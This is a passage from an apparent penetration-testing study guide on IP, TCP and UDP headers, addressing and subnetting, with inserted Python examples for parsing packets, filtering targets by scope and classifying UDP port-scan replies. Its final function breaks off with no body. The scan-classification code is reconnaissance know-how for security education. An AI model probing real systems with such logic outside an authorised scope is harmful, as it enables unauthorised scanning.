Header Length: This field indicates how many words are in the IP header. Because the header is based on 32-bit words, which is 4 bytes, you can get the number of bytes by multiplying this value by 4. In the case of this example, you'll find that the headers are 20 bytes (five words), which is common for an IP header. The smallest legal value is 5; anything larger means IP options are present (up to 15 words, or 60 bytes), and a value below 5 is malformed and should be rejected by anything parsing the packet.

Type of Service: The RFC calls this the type of service (ToS) field, though you'll also see it referred to as the differentiated services field, since its bits have since been redefined as a 6-bit differentiated services code point plus 2 bits for explicit congestion notification. This field helps network elements make quality of service (QoS) decisions by prioritizing some messages and deprioritizing others. This is an 8-bit (1-byte) field.

Total Length: This is the total length of the message, including the IP header and any subsequent data. This does not include any header that gets added on after the fact, like the layer 2 header. This field is 2 bytes long, which allows for a total message length of 65,535 octets (bytes).

Identification: Sometimes there is more data being sent than will fit into the largest frame a link along the path can carry (its maximum transmission unit, or MTU, commonly 1,500 bytes on Ethernet), which is far smaller than the 65,535 bytes the length field allows. This means the messages sometimes need to be fragmented. All messages sent get this field set, though it only means anything if there are fragments. All fragments of the same original packet will have the same identification value.

Flags: There are 3 bits allocated to a flags field. One is reserved and must be zero, and the second indicates whether the message can be fragmented. This is sometimes called the DF bit. If it's set, it means don't fragment the message. The last bit is used to indicate whether there are additional fragments. If it's set, there are more fragments. If it is unset (meaning 0), it's the last fragment. A message that is self-contained, meaning it didn't require any fragmenting, would have this bit clear and a fragment offset of 0.

Fragment Offset: The fragment offset field, 13 bits long, indicates where the data in the packet aligns within the original datagram. This lets the receiving system know how to stitch all the fragments together. The value in this field is in units of 8 octets (bytes), so the 13 bits can express offsets up to 65,528 bytes. Reassembly code has to validate these values, because overlapping or out-of-range fragments have long been used both to evade intrusion detection and to crash IP stacks.

Time to Live: The time to live (TTL) field indicates how long a message can live on the network before it is considered to be expired. It is meant to be measured in seconds, though every network device that touches the message must decrement this field. Since the packet may pass through multiple network devices in a second, the initial definition of this field isn't relevant anymore, and the TTL really indicates the number of network devices (routing devices, essentially) the message can pass through. Once the field hits 0, the message is discarded, and an error message (an ICMP Time Exceeded message) is returned to the sender. This field is 8 bits long.

Protocol: This is a numeric value indicating what the next protocol is. It is an 8-bit field and tells the receiving system what headers to look for in the transport header. In the case of the packet in Figure 2.9, the value is 17, which means it's a UDP message. The other values you will see most often are 6 for TCP and 1 for ICMP.

Checksum:
This is a 16-bit value that is used to determine whether the header is intact. It is defined as the one's complement of the one's complement sum of the 16-bit words in the header. It covers only the IP header, not the payload, and every router recomputes it because the TTL changes at each hop.

Source Address: This is the IP address that sent the message. It is 4 octets in length.

Destination Address: This is the IP address that the message is going to. It is also 4 octets in length.

Octets vs. Bytes

You will sometimes see the term octet used, and you may be wondering why we use the term octets instead of bytes since what we are referring to is a value that is 8 bits in length. The reason is that the RFCs were written to be implemented on any system. When these protocols were defined, a byte wasn't the same size on every architecture; 8 bits was common, but some machines of the era used other byte sizes. To be very clear, the word byte wasn't used. Instead, a value that was 8 bits was an octet. If the word octet is used, there is no confusion.

Addressing

IP version 4 addresses are 4 octets long. They are commonly shown as being separated by a period (.). Because of this, they are sometimes referred to as dotted quads. Since each value is 8 bits, there are potential values of 0 to 255. Not all values, especially in the first octet, are available for ordinary hosts, however. There are some addresses that are held in reserve, for various reasons. For a start, the address range 127.0.0.0–127.255.255.255 is reserved for loopback addresses. These are addresses that refer to the host they are assigned to. The loopback interface ensures there is always a network interface on the system and allows for testing over a network without sending any traffic outside the system. Commonly, the loopback address on systems is 127.0.0.1, though any address in that range could be used.

RFC 1918 also carves out ranges of IP addresses that are used for private networks. By convention, these addresses are not routable over the Internet. Most networks will do something to block source addresses from these ranges coming into their space, since they should never be originating from outside a network. The ranges for these private addresses, meant to be used by any network that doesn't have public IP addresses, are 10.0.0.0–10.255.255.255 (10.0.0.0/8), 172.16.0.0–172.31.255.255 (172.16.0.0/12), and 192.168.0.0–192.168.255.255 (192.168.0.0/16). Additionally, other address ranges are held in reserve. The range 224.0.0.0 through 239.255.255.255 is used for multicast messages. Anything from 240.0.0.0 upward is also reserved and is not currently in use, with the exception of 255.255.255.255, the limited broadcast address.

One of the reasons for moving to IPv6 is the limitation on addresses with version 4. There are approximately 4 billion addresses available with IPv4. This includes the entire set of addresses, though. Out of that, we lop off 16 million right away just because of the 10.0.0.0 private address block. Then, we take away more than 268 million because of the addresses higher than 240.0.0.0. You can see how quickly address space in IPv4 disappears. You may also have noticed that the number of devices that are connecting to the Internet is increasing at a nearly exponential rate. The stopgap for this is to use private address ranges on the inside of networks, especially home networks, behind network address translation.

Instead of just the 4 octets that are used in IPv4, IPv6 uses 16 bytes (128 bits). Because it would be awkward to write an IPv6 address in dotted octet form as we do with IPv4, addresses in IPv6 are written in a different form. Because an octet can be represented with two hexadecimal digits, you will see IPv6 addresses represented in that way. It saves space and typing. Since there are 16 octets in an IPv6 address, the longest address you will run across will be 32 hexadecimal characters. The complete address is separated into groups of two bytes (16 bits, four hexadecimal digits) with a colon (:) between them. As an example, one of my systems has an IPv6 address of fe80::62e3:5ec3:3e06:daa2. In addition to the address being broken up into byte pairs, like fe80, you'll notice there is a part of the address that has a colon pair with nothing in between. This is not a mistake. This is a shorthand to indicate that what is in the middle is all 0s. The complete address would be fe80:0000:0000:0000:62e3:5ec3:3e06:daa2. It's easier to drop the extra 0s out. The double colon may appear only once in an address, since otherwise the number of zero groups it stands for would be ambiguous; leading zeros within a group may also be dropped.

IPv6 has three different address types. The first is unicast, which refers to a single system. Anycast addresses are groups of systems that share a single address. A message sent to the anycast address will be delivered to just one of the hosts in the anycast group. This will commonly be the closest host, based on routing rules. Any anycast address will have the same format as a unicast address. Multicast addresses will look like the other addresses, but they are distinguished by their prefix: every IPv6 multicast address begins with ff, and the next two hexadecimal digits carry flags and a scope that depend on the application using the address. The IPv6 all-nodes address on the local link, for example, is ff02::1; its IPv4 counterpart is the multicast address 224.0.0.1.
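The header layout, the checksum rule and the reserved address ranges described above, as an added example that is not code from the study guide. It builds a 20-byte IPv4 header with a correct checksum, parses it back with the sanity checks a real stack applies, shows that a single changed byte breaks the checksum, and classifies addresses into the ranges just listed; the packet and the addresses in the test are constructed for illustration and nothing is sent on the network.

```python
"""IPv4 header parsing and checksum (RFC 791) plus address classification.

Added example for the header and addressing discussion above; not code from the
study guide. The packets built here are constructed in memory and never sent.
"""
import ipaddress
import struct

IPV4_HEADER = "!BBHHHBBH4s4s"   # fixed 20-byte header, network byte order


def ipv4_checksum(header):
    """One's complement of the one's complement sum of the header's 16-bit words."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                       # fold the carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ipv4(src, dst, protocol, payload, ttl=64, ident=0x1234, dont_fragment=True):
    """Build a header without options, with a correct checksum, followed by the payload."""
    flags_frag = 0x4000 if dont_fragment else 0    # DF is bit 1 of the 3-bit flags field
    fields = [0x45, 0, 20 + len(payload), ident, flags_frag, ttl, protocol, 0,
              ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed]
    fields[7] = ipv4_checksum(struct.pack(IPV4_HEADER, *fields))  # computed with field zeroed
    return struct.pack(IPV4_HEADER, *fields) + payload


def parse_ipv4(packet):
    """Decode the fixed fields; reject anything that is not a sane IPv4 header."""
    if len(packet) < 20:
        raise ValueError("truncated: %d bytes" % len(packet))
    (ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, _csum,
     src, dst) = struct.unpack(IPV4_HEADER, packet[:20])
    version, ihl = ver_ihl >> 4, ver_ihl & 0x0F
    if version != 4:
        raise ValueError("not IPv4 (version %d)" % version)
    header_len = ihl * 4                            # IHL counts 32-bit words; minimum 5
    if header_len < 20 or header_len > total_len or total_len > len(packet):
        raise ValueError("inconsistent lengths")
    return {
        "tos": tos, "total_length": total_len, "id": ident, "header_length": header_len,
        "df": bool(flags_frag & 0x4000), "mf": bool(flags_frag & 0x2000),
        "fragment_offset": (flags_frag & 0x1FFF) * 8,   # 13 bits, in 8-octet units
        "ttl": ttl, "protocol": {1: "ICMP", 6: "TCP", 17: "UDP"}.get(proto, proto),
        # Summing the header including its stored checksum must give zero.
        "checksum_ok": ipv4_checksum(packet[:header_len]) == 0,
        "src": str(ipaddress.IPv4Address(src)), "dst": str(ipaddress.IPv4Address(dst)),
        "options": packet[20:header_len], "payload": packet[header_len:total_len],
    }


def classify(address):
    """Name the reserved range an address falls in (IPv4 or IPv6)."""
    ip = ipaddress.ip_address(address)
    if ip.is_loopback:
        return "loopback"
    if ip.is_multicast:
        return "multicast"
    if ip.is_link_local:
        return "link-local"
    if ip.version == 4 and ip.is_reserved:          # 240.0.0.0/4
        return "reserved"
    if ip.is_private:
        return "private"
    return "global"


def compress_ipv6(address):
    """Shortest textual form, with the single permitted '::' standing for a run of zeros."""
    return ipaddress.IPv6Address(address).compressed
```

The length checks in parse_ipv4 are the part most often skipped in quick scripts and most often exploited in real stacks: a header length below 20, or a total length that runs past the bytes actually received, must be treated as an error rather than indexed blindly.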
Subnets

Subnetting can be a challenge to understand, but it's an important concept. One of the reasons it's important is that you may need to know what addresses belong to your target based on a subnet. If you don't get the subnet boundaries correct, there is a chance that you will start testing against systems that don't belong to your target. This can get you into a lot of trouble. Because of that, we'll spend a little time here talking about what subnets are and how to determine the boundaries of subnets. This will involve some simple math, but ideally it will be easy once it's explained to you.

IP addresses are aggregated into networks using contiguous addresses. This is relevant no matter whether we're talking about IPv4 or IPv6. This makes routing to those addresses easier since routing tables don't have to keep track of every single IP address. Instead, the aggregate blocks are tracked. In part because of this, a part of the IP address belongs to the host and part belongs to the network. This segmentation of the address also helps systems to know what addresses are local, meaning the communications stay on the local network. The way systems are told what are local networks and what are not local networks is that a subnet mask is paired with the IP address. The subnet mask is also 32 bits in length and represented as a dotted quad. To determine what portion of an IP address belongs to the network, you look at the bits that are set to 1 in the subnet mask. To better understand this concept, let's take a look at a binary representation of a subnet mask.

11111111.11111111.11111111.10000000

Any bit position that has a 1 in it is part of the network segment. You'll notice that the 1s are filled in from the left and there are no gaps. As a result, each octet of a subnet mask can have only certain values: 0, 128, 192, 224, 240, 248, 252, 254, and 255. This is because every position is a power of two and we add on from the most significant bit on the left side. The binary 10000000 equals 128 in decimal. 11000000 is 192. Every time we set a bit to 1, we add on the next lower power of 2. Looking at the subnet mask above and applying binary to decimal translation, we can see that the subnet mask is 255.255.255.128. This means that only the last 7 bits of the last octet are used for host values. The bit representation in the last octet would be 10000000.

This is where we need to start applying the IP address to the subnet mask to get the address range. With a subnet mask of 255.255.255.128, I have the possibility of two address blocks, regardless of what the IP address is. I can only vary the last octet, and I am constrained because I can't change the value in the most significant bit position. This leaves me with the ranges of 0–127 and 128–255. Once I know what my IP address is, I know which block I am in. Let's say my IP address is 172.20.30.42, and my netmask is 255.255.255.128. I know my address block has to be 172.20.30.0–172.20.30.127 because that's the range that .42 lands in. Mechanically, this is a bitwise AND of the address with the mask: 42 AND 128 is 0, so the network address is 172.20.30.0, and setting all the host bits gives the broadcast address, 172.20.30.127.

Another way of designating network blocks is using Classless Interdomain Routing (CIDR) notation. This means that rather than indicating a subnet mask, you only get the number of prefix bits. The prefix tells you which bits are being used for the network. The subnet mask used above translates to /25, and I would indicate the subnet with the IP address by indicating 172.20.30.42/25. Using this notation actually makes life a little easier if you think about it in powers of two. Let's say you want to know how many addresses belong to a particular network block and you have the CIDR notation. One way to make that determination is to start with a known quantity. Often, you will see CIDR notation hovering around the /24 area, which is a 255.255.255.0 subnet mask and is common. If you want to know how many hosts, you just divide by 2 or multiply by 2 for every bit change in the prefix. A network that is a /24 has 256 possible values in the host portion (the last octet). If you go to a /25, that means you get 128 possible values (divide by 2 because you added a prefix bit, meaning you lost a host bit). If you go the other direction to a /23, you double because you lost a prefix bit, meaning it got added to the host portion. Instead of 256, you now have 512 possible values in the host portion. In general, a /n block contains 2 to the power of (32 minus n) addresses.

You can also see pretty quickly how to get even smaller prefix values just by looking at the number of bits in each octet. If the first octet is used for the network designation and all others are used for the host values, you would have all the bit positions in that first byte filled up, which means you are using 8 bits, leaving you with a CIDR designation of /8. Similarly, if you use the first two octets, you are using 16 bits, so you have a /16.

One note about subnets, though, is that there are two values that can't be used for systems. The lowest possible address in any network segment is used for the network. The highest possible address in any network segment is used for the broadcast address. In a common /24 network, the .0 becomes the network address, and the .255 is used for the broadcast. Neither of these can be allocated for hosts. The exceptions are /31 point-to-point links, where RFC 3021 allows both addresses to be assigned, and /32, which designates a single host.

IPv6 makes the whole process even easier. There are no dotted subnet masks used any longer. Instead, CIDR designation is used exclusively to indicate which part is network and which is host. The same rules apply. The network portion always starts from the left, and we fill in bits of the mask from the left. A /50 network means that the first 50 bits of the address are the network designation. This leaves the remaining 78 bits (keep in mind that IPv6 addresses are 128 bits long) for the host. That would be an incredibly large network, of course.

TCP

Moving to the Transport layer, we first run across TCP. Where IP is a best-effort protocol, meaning that a best effort is made to get messages from one system to another, TCP is said to have guaranteed delivery. This is less impressive, perhaps, than it sounds. Obviously, TCP by itself can't ensure delivery in the case of catastrophic failure in the network. Instead, what it means is there are mechanisms in the protocol that keep track of all of the messages that are sent, and if something doesn't get to the other end and acknowledged there, messages will be re-sent.
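Before going further into TCP, here is the subnet arithmetic from the section above as a worked example (added here; it is not code from the study guide). It converts between dotted masks and prefix lengths, rejecting masks whose 1 bits are not contiguous, derives network, broadcast and host range by the AND/OR method just described, and finishes with the scoping check the section opens with: filtering a candidate target list against the agreed CIDR blocks before any probe is sent. The scope blocks and candidate addresses are invented.

```python
"""Subnet arithmetic done by hand, with the scope check a tester does before probing.

Added example for the subnetting discussion above; it is not code from the study
guide. The scope list and candidate addresses used in the tests are invented.
"""
import ipaddress

ALL_ONES = 0xFFFFFFFF


def prefix_to_mask(prefix):
    """/25 -> '255.255.255.128': the top `prefix` bits set, contiguous from the left."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix out of range: %r" % prefix)
    return str(ipaddress.IPv4Address((ALL_ONES << (32 - prefix)) & ALL_ONES))


def mask_to_prefix(mask):
    """'255.255.255.128' -> 25; rejects masks whose 1 bits are not contiguous."""
    bits = int(ipaddress.IPv4Address(mask))
    prefix = bin(bits).count("1")
    if bits != (ALL_ONES << (32 - prefix)) & ALL_ONES:
        raise ValueError("non-contiguous subnet mask %s" % mask)
    return prefix


def host_bits(prefix, version=4):
    """Bits left for hosts: 32 (IPv4) or 128 (IPv6) minus the prefix length."""
    total = 32 if version == 4 else 128
    if not 0 <= prefix <= total:
        raise ValueError("prefix out of range: %r" % prefix)
    return total - prefix


def subnet_bounds(address, prefix):
    """Network, broadcast, usable host range and size for an IPv4 address/prefix."""
    addr = int(ipaddress.IPv4Address(address))
    mask = (ALL_ONES << (32 - prefix)) & ALL_ONES
    network = addr & mask                      # AND with the mask keeps the network bits
    broadcast = network | (~mask & ALL_ONES)   # OR with the inverted mask sets the host bits
    size = 1 << host_bits(prefix)              # 2^(host bits) addresses in the block
    if prefix >= 31:                           # /31 (RFC 3021) and /32 reserve no addresses
        first, last, usable = network, broadcast, size
    else:
        first, last, usable = network + 1, broadcast - 1, size - 2
    ip = ipaddress.IPv4Address
    return {"network": str(ip(network)), "broadcast": str(ip(broadcast)),
            "first_host": str(ip(first)), "last_host": str(ip(last)),
            "size": size, "usable_hosts": usable,
            "cidr": "%s/%d" % (ip(network), prefix)}


def in_scope(address, scope):
    """True if address lies inside any CIDR block in scope (IPv4 or IPv6 blocks)."""
    ip = ipaddress.ip_address(address)
    return any(ip in ipaddress.ip_network(block, strict=False) for block in scope)


def filter_targets(candidates, scope):
    """Split candidates into (in_scope, out_of_scope) before any probing starts."""
    inside = [c for c in candidates if in_scope(c, scope)]
    outside = [c for c in candidates if c not in inside]
    return inside, outside
```

The strict=False in in_scope matters in practice: scope documents often give a block as host/prefix (172.20.30.42/25) rather than as the network address, and without it ipaddress refuses such input; the function still compares against the whole block, never just the single host.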
The protocol data unit for TCP is called a segment. The layers we have looked at so far have forms of addressing. The Transport layer is no different. Where previous addresses are related to the systems to ensure messages get from one system to another, at the Transport layer, we start to become concerned about getting messages to the application. Transport layer protocols provide ports as a way of addressing applications. They also provide multiplexing. Without ports, we wouldn't be able to have multiple applications listening on the same system. With ports, we have a large capacity for conversations with other systems.

Just as we did with IP, we're going to take a look at the headers that are defined for TCP. TCP is defined in RFC 793, and it was also written in 1981, which means TCP has been around for a long time. The header layout has remained unchanged in all that time; the protocol's functionality has been extended through the options field (window scaling, selective acknowledgment, and timestamps, for example) rather than by changing the fixed fields. Figure 2.10 shows the TCP headers from a packet capture.

Figure 2.10: TCP headers

You will see the following fields in the capture:

Source Port: The source port is the port that the traffic originated from on the sending side. This is important because conversations are not one-way. For the recipient to be able to respond, it needs a port to send back to. When messages are responded to, the source and destination ports are reversed. The source port is 16 bits in length.

Destination Port: The destination port is the one that is associated with an application. Every conversation has a client side and a server side. The server side binds an application to a listening port. The client sends to this port as the destination port. If the server is sending from the server to the client, the destination port is the ephemeral port assigned to the application that is communicating with the server. The destination port, like the source port, is 16 bits in length.

Sequence Number: The sequence number is part of what contributes to the guaranteed delivery. This is a 32-bit number that is set to a random value when the conversation is initiated. It is incremented by the number of bytes that are sent, and the SYN and FIN flags each consume one sequence number as well. Using the sequence number, the sender tells the recipient where in the conversation this message falls. You'll see in the example that the sequence number shows as 0. The reason for this is that the packet capture software presents relative sequence numbers, counted from the initial sequence number of the conversation, which are easier to follow. The initial value must be unpredictable; if an attacker can guess it, they can inject segments into a connection or complete a handshake blindly, which is why RFC 6528 specifies a randomized initial sequence number algorithm.

Acknowledgment Number: The acknowledgment number is the opposite side of the conversation from the sequence number. Where the sequence number is set by the sender, the acknowledgment number is set by the recipient. The acknowledgment number is set to the sequence number of the next byte the recipient expects to receive, that is, the last byte received in order plus 1. This tells the sender where in the communication stream the recipient is, which lets the sender know whether anything has been lost in transmission. The field is only meaningful when the ACK flag is set.

Data Offset: The data offset is a 4-bit value indicating the number of 32-bit words in the TCP header. It lets the system know where to look for the data. This is necessary because the TCP header can be variable length. This field isn't shown in the figure, but it is a defined TCP header field. The minimum value is 5, a 20-byte header with no options.

Reserved: There are 6 bits in the TCP header that are reserved for future use. Later RFCs have since assigned two of them to explicit congestion notification (the CWR and ECE flags).

Control Bits: There are 6 flag bits that are used to indicate disposition of the message. The SYN flag is the synchronize flag, indicating that the sequence number is set and should be recorded. The ACK flag is the same for the acknowledgment number. The URG flag indicates that the urgent pointer has data that is significant. The PSH flag is an indication that the data should be pushed up rather than being buffered. The RST flag resets the connection, which may happen if a message is received that appears to be in error, or if a segment arrives for a port with no listener. The FIN flag indicates that the conversation is over and there is no more data to send.

Window: The value in the window field tells the recipient how many bytes the sender of the segment is willing to accept beyond the acknowledgment number. This allows for speeding up and slowing down the communication. A smaller window size means more acknowledgments are necessary, which may be an indication that the receiver is under pressure or the communication channel isn't reliable. A larger window size means the channel is reliable so there isn't as much need to keep checking in. The window field is 16 bits, which caps it at 65,535 bytes unless the window scale option is negotiated during the handshake.

Checksum: This is a 16-bit field used to ensure that the communication hasn't been corrupted. This is a one's complement value calculated over a pseudo-header (containing the IP addresses, the protocol number and the TCP length), the TCP header and the data.

Urgent Pointer: The 16-bit urgent pointer indicates the next byte value after the urgent data. This aligns with the sequence number values. Essentially, the urgent pointer says the data from the current sequence number up until the value in the urgent pointer is urgent data.

Options: These are variable-length header fields. The header must align on 32-bit words. If the options leave the header length short of that alignment, padding bits are necessary to fill the remainder of the header.

TCP uses multiple mechanisms to ensure a reliable service. The first is that TCP is connection-oriented. Connections are established using what is called a three-way handshake. Figure 2.11 shows a diagram of the handshake process. The handshake ensures that both sides of the conversation are live and active because they are expected to respond. The first message in the three-way handshake is the SYN message. The SYN flag is set, as well as the initial sequence number, which is a random value. The response to the SYN message is a SYN/ACK. This sets the ACK flag and carries an acknowledgment number equal to the client's initial sequence number plus one, indicating the first message was received. In the same segment, the SYN flag and the server's own initial sequence number are also set. Keep in mind that the conversation is two-way, so both sides have to keep track of where they are in the conversation. Each side keeps track of a sequence number for their side and an acknowledgment number for the other side. The final message in the handshake is one that just has the ACK flag set, and its acknowledgment number is the sequence number set in the SYN/ACK message plus one.

Figure 2.11: Three-way handshake (SYN, SYN/ACK, ACK)
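The header fields and the handshake arithmetic just described, as an added example (not code from the study guide). It packs and parses segments, pads options to the 32-bit boundary the data offset requires, generates a handshake with unpredictable initial sequence numbers, and validates the three segments the way a host would, including the case where a spoofer who guessed the server's ISN wrong cannot complete the exchange. Segments are built in memory only; the checksum is left at zero because it needs the IP pseudo-header, which this example does not model, and the ports and fixed ISNs in the tests are made up.

```python
"""TCP header encode/decode and three-way handshake sequence arithmetic (RFC 793).

Added example for the TCP header and handshake discussion above; it is not code
from the study guide. Segments are built in memory only and the checksum is left
at zero (it needs the IP pseudo-header, which this example does not model).
"""
import secrets
import struct

FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}
TCP_HEADER = "!HHIIBBHHH"   # ports, seq, ack, offset/reserved, flags, window, checksum, urgent
MOD32 = 1 << 32


def build_tcp(src_port, dst_port, seq, ack, flags, window=65535, options=b"", payload=b""):
    """Pack a TCP segment; options are padded so the header stays 32-bit aligned."""
    options += b"\x00" * (-len(options) % 4)
    data_offset = 5 + len(options) // 4       # header length in 32-bit words
    bits = 0
    for name in flags:
        bits |= FLAG_BITS[name]
    header = struct.pack(TCP_HEADER, src_port, dst_port, seq % MOD32, ack % MOD32,
                         data_offset << 4, bits, window, 0, 0)
    return header + options + payload


def parse_tcp(segment):
    """Decode the fixed header; the data offset tells us where options end and data begins."""
    (sport, dport, seq, ack, off_reserved, bits,
     window, _checksum, urgent) = struct.unpack(TCP_HEADER, segment[:20])
    header_len = (off_reserved >> 4) * 4
    if header_len < 20 or header_len > len(segment):
        raise ValueError("bad data offset")
    return {"src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
            "flags": {n for n, b in FLAG_BITS.items() if bits & b},
            "window": window, "urgent_pointer": urgent,
            "options": segment[20:header_len], "payload": segment[header_len:]}


def next_expected(seq, payload_len, flags):
    """Acknowledgment number a receiver sends back: data bytes plus one for SYN or FIN."""
    consumed = payload_len + (1 if "SYN" in flags else 0) + (1 if "FIN" in flags else 0)
    return (seq + consumed) % MOD32


def handshake(client_port, server_port, client_isn=None, server_isn=None):
    """Return the SYN, SYN/ACK and ACK segments with correct seq/ack values."""
    c = secrets.randbelow(MOD32) if client_isn is None else client_isn   # unpredictable ISN
    s = secrets.randbelow(MOD32) if server_isn is None else server_isn
    syn = build_tcp(client_port, server_port, c, 0, {"SYN"})
    syn_ack = build_tcp(server_port, client_port, s, next_expected(c, 0, {"SYN"}),
                        {"SYN", "ACK"})
    ack = build_tcp(client_port, server_port, next_expected(c, 0, {"SYN"}),
                    next_expected(s, 0, {"SYN"}), {"ACK"})
    return [syn, syn_ack, ack]


def validate_handshake(segments):
    """Check the three segments the way a host would: flags and seq/ack must chain."""
    if len(segments) != 3:
        return False
    syn, syn_ack, ack = (parse_tcp(s) for s in segments)
    return (syn["flags"] == {"SYN"}
            and syn_ack["flags"] == {"SYN", "ACK"}
            and syn_ack["ack"] == next_expected(syn["seq"], 0, syn["flags"])
            and ack["flags"] == {"ACK"}
            and ack["seq"] == next_expected(syn["seq"], 0, syn["flags"])
            and ack["ack"] == next_expected(syn_ack["seq"], 0, syn_ack["flags"]))
```

Note that the arithmetic wraps modulo 2^32: an initial sequence number of 0xFFFFFFFF is acknowledged with 0, and any implementation that compares sequence numbers with plain less-than rather than modular arithmetic will mishandle exactly that case.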
Since both sides are expected to respond to messages with information provided by the other, we can be reasonably assured that the message was received by the intended party, because each side must have seen the other's initial sequence number. Be precise about what this does and does not prove: it shows that the peer can receive traffic at the source address it used, not who the peer is. If either side were attempting to spoof a conversation from an address it cannot receive traffic for, it wouldn't receive the messages and, as a result, wouldn't respond correctly. Historically, predictable initial sequence numbers made exactly that kind of blind spoofing possible, which is why initial sequence numbers are now generated unpredictably.

The next mechanism that helps ensure reliability is the sequence number. Since the sequence number maintains the count of bytes that have been sent, the acknowledgment number tells the sender whether any data has gone missing in transmission. If it has, the sender knows it needs to be retransmitted. Each side of the conversation knows where it is and where its partner is. TCP retransmits as needed, up to a defined maximum.

Additionally, the sequence and acknowledgment numbers ensure the correct order of messages at the recipient. If messages arrive out of order, the sequence numbers indicate whether messages should be held for a message that got lost. This is also a part of guaranteed delivery: making sure that the messages not only arrive as expected but also are in the correct order when they get there. All of this, though, incurs overhead. Not every application needs the guaranteed delivery model that TCP provides.

UDP

UDP offers another mode of transport that doesn't have the same overhead that TCP has. It's a much lighter-weight protocol that offers no guarantee of delivery. Messages sent using UDP are just put out on the wire with the hope that they will get to the destination because the network protocol, IP, will just take care of everything. With the lighter weight comes very little overhead from things like establishing connections and making sure that messages get where they are going. It also doesn't much matter which order messages are received in from the standpoint of the protocol. If the application is interested in those sorts of details, it can take care of the management.

The RFC for UDP is RFC 768. The entire RFC is a little over two pages long, which should make clear how simple the protocol is. You can see an example of a UDP header in Figure 2.12. There are four header fields. All of them are 16 bits in length. Unsurprisingly, half of them are the source and destination ports; the other two are the length of the datagram (header plus data) and a checksum, which over IPv4 is optional and is sent as all zeros when the sender did not compute it (IPv6 requires it). What's interesting about that is the source port is also considered an optional field. The reason for this is that since there is no connection, there may never be a response from the server. It's entirely up to the application in use, which is different from TCP. A source port is required with TCP because there will always be a response, even if it's just used to complete the three-way handshake.

Figure 2.12: UDP headers

Interestingly, perhaps, RFC 768 does not define a response to a closed UDP port. In fact, closed ports are not mentioned. The only place where responses to closed ports are mentioned that is relevant is in the RFC for the Internet Control Message Protocol (ICMP). Even then, there is just a code for port unreachable. The ICMP message does quote the IP header and the first 8 bytes of the offending datagram, which is enough to recover the protocol and the ports, but nothing obliges the remote host to send it: many systems rate-limit these replies, and firewalls routinely drop them. For this reason, working with UDP ports is entirely unreliable. If you don't get a response, it could be a result of a lost or dropped packet. It could be the application ignored the message. It could be there was no response required. Any of those are legitimate scenarios in which you wouldn't get a response to a message to a UDP port, which is why port scanners report such ports as "open or filtered" rather than as open.
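The UDP header, the ICMP port-unreachable message it relies on, and the ambiguity just described, as an added example (not code from the study guide). It decodes the four UDP fields, decodes an ICMP error far enough to read the quoted IP header and ports, and then classifies a probe result the way a port scanner does: a UDP reply means open, a matching type 3/code 3 means closed, other unreachable codes mean filtered, and silence is reported as open|filtered. Because traceroute (discussed under ICMP below) depends on the same decoding, the block also tells an intermediate hop's Time Exceeded apart from the final Port Unreachable. Packets are constructed in memory using documentation address ranges and are never sent; IP and ICMP checksums are left at zero since nothing here verifies them.

```python
"""UDP and ICMP decoding: classifying a UDP probe result, and the ICMP replies
that traceroute depends on.

Added example for the UDP and ICMP discussion; it is not code from the study guide.
Packets are constructed in memory and never sent; IP and ICMP checksums are left at
zero because nothing here verifies them.
"""
import struct

UDP = 17
ICMP_DEST_UNREACH, ICMP_TIME_EXCEEDED = 3, 11
PORT_UNREACH = 3
FILTERED_CODES = {1, 2, 9, 10, 13}   # host/net unreachable, administratively prohibited


def ip4(addr):
    return bytes(int(o) for o in addr.split("."))


def build_ipv4(src, dst, protocol, payload, ttl=64):
    """Minimal 20-byte IPv4 header with the checksum zeroed (not validated here)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, ttl,
                       protocol, 0, ip4(src), ip4(dst)) + payload


def build_udp(src_port, dst_port, payload=b""):
    """Four 16-bit fields: ports, length of header plus data, checksum (0 = not computed)."""
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), 0) + payload


def build_icmp_error(icmp_type, code, offending_packet):
    """ICMP errors quote the original IP header plus the first 8 bytes of its payload."""
    ihl = (offending_packet[0] & 0x0F) * 4
    return struct.pack("!BBHI", icmp_type, code, 0, 0) + offending_packet[:ihl + 8]


def parse_udp(datagram):
    src_port, dst_port, length, checksum = struct.unpack("!HHHH", datagram[:8])
    return {"src_port": src_port, "dst_port": dst_port, "length": length,
            "checksum_present": checksum != 0, "payload": datagram[8:length]}


def parse_icmp(message):
    """Type, code and, for errors, the quoted original packet's addresses and ports."""
    icmp_type, code, _csum = struct.unpack("!BBH", message[:4])
    info = {"type": icmp_type, "code": code}
    if icmp_type in (ICMP_DEST_UNREACH, ICMP_TIME_EXCEEDED) and len(message) >= 36:
        quoted = message[8:]
        ihl = (quoted[0] & 0x0F) * 4
        info["orig_proto"] = quoted[9]
        info["orig_src"] = ".".join(str(b) for b in quoted[12:16])
        info["orig_dst"] = ".".join(str(b) for b in quoted[16:20])
        # The first 8 quoted bytes after the IP header hold both ports for UDP and TCP.
        info["orig_ports"] = struct.unpack("!HH", quoted[ihl:ihl + 4])
    return info


def classify_udp_probe(probe, reply=None):
    """Scanner-style verdict. reply is None, ("udp", bytes) or ("icmp", bytes)."""
    ihl = (probe[0] & 0x0F) * 4
    sent = parse_udp(probe[ihl:])
    probe_dst = ".".join(str(b) for b in probe[16:20])
    if reply is None:
        return "open|filtered"     # silence proves nothing: dropped, ignored, or no reply needed
    kind, data = reply
    if kind == "udp":
        return "open"
    icmp = parse_icmp(data)
    # Only trust an error that quotes our own probe; anything else is noise or a decoy.
    if (icmp.get("orig_dst") != probe_dst
            or icmp.get("orig_ports") != (sent["src_port"], sent["dst_port"])):
        return "unrelated"
    if icmp["type"] == ICMP_DEST_UNREACH and icmp["code"] == PORT_UNREACH:
        return "closed"
    if icmp["type"] == ICMP_DEST_UNREACH and icmp["code"] in FILTERED_CODES:
        return "filtered"
    return "open|filtered"


def traceroute_reply_kind(reply):
    """What a traceroute probe got back: an intermediate hop, the destination, or noise."""
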